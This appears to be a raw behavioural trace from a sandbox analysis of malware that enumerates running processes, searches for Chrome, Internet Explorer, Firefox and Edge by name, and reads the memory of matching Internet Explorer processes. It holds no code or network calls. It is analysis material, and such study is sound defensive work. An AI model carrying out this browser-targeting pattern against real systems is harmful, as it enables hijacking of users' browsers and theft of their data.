	[0194.037] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0194.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.038] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.038] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0194.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.038] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.038] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0194.039] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xb34
	[0194.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.039] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0194.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.040] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.040] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0194.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.041] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.041] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0194.042] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xb38
	[0194.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.042] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0194.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.042] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.043] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0194.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.043] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.043] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0194.044] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xb3c
	[0194.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.044] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0194.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.045] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.045] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0194.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.046] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.046] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0194.047] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xb40
	[0194.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.047] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0194.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.047] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.047] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0194.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.047] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.048] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0194.048] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xb44
	[0194.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.048] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0194.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.049] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.049] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0194.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.050] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.050] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0194.051] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xb48
	[0194.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.051] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0194.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.051] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.052] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0194.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.052] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.053] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0194.053] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xb4c
	[0194.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.053] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0194.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.054] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.054] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0194.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.054] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.054] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0194.055] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xb50
	[0194.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.055] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0194.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.055] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.056] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0194.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.056] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.056] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0194.057] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xb54
	[0194.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.057] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0194.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.057] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.058] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0194.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.058] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.059] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0194.059] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xb58
	[0194.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.059] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0194.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.060] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.060] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0194.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.061] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.061] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0194.062] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xb5c
	[0194.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.062] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0194.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.063] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.063] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0194.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.064] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.064] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0194.065] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xb60
	[0194.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.065] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0194.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.066] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.067] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0194.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.067] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.068] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0194.068] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xb64
	[0194.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.069] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0194.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.069] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.069] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0194.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.070] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.070] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0194.071] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xb68
	[0194.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.071] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0194.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.071] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0194.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.072] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0194.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.072] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.072] NtQueryInformationProcess (in: ProcessHandle=0xb68, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0194.072] ReadProcessMemory (in: hProcess=0xb68, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0194.072] ReadProcessMemory (in: hProcess=0xb68, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0194.072] ReadProcessMemory (in: hProcess=0xb68, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0194.072] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0194.072] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0194.073] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xb6c
	[0194.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.073] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0194.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.074] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0194.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.074] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0194.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.074] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.074] NtQueryInformationProcess (in: ProcessHandle=0xb6c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0194.074] ReadProcessMemory (in: hProcess=0xb6c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0194.074] ReadProcessMemory (in: hProcess=0xb6c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0194.075] ReadProcessMemory (in: hProcess=0xb6c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0194.075] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0194.075] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0194.075] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xb70
	[0194.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.076] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0194.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.076] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.076] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0194.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.076] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.077] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0194.077] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xb74
	[0194.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.077] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0194.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.078] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.078] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0194.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.078] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.079] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.079] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xb78
	[0194.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.079] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.080] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.080] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.081] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.081] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.082] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0194.082] CloseHandle (hObject=0x188) returned 1
	[0194.082] Sleep (dwMilliseconds=0x64) 
	[0194.190] GetCurrentProcessId () returned 0x110
	[0194.190] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0194.192] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0194.192] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0194.193] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0194.194] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xb7c
	[0194.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.194] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0194.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.194] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.194] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0194.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.195] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.195] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0194.196] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xb80
	[0194.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.196] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0194.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.196] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.196] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0194.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.197] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.197] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0194.197] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xb84
	[0194.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.198] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0194.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.198] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.198] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0194.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.199] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
